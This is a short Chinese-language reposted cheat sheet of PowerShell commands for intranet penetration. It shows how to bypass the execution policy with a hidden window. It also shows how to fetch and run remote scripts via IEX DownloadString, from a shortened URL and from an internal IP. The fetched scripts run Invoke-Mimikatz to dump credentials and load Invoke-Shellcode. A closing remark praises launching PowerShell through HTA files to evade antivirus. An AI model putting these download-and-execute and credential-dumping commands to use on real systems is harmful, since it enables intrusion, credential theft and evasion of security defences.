您的位置:首页 > 运维架构 > Shell

PowerShell

2015-09-30 16:02 471 查看
摘自:《powershell内网渗透_light》

本地权限绕过
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1


本地隐藏权限绕过执行脚本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1

直接用IEX下载远程的PS1脚本回来权限绕过执行

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


内网渗透实例
远程代码执行:

IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/path/xxx.ps1”)


目标主机‘安装’invoke-shellcode脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.146.129/CodeExecution/Invoke--Shellcode.ps1")

查看帮助信息:

Get-Help Invoke-Shellcode


有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。(文章地址:http://www.freebuf.com/tools/90362.html
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: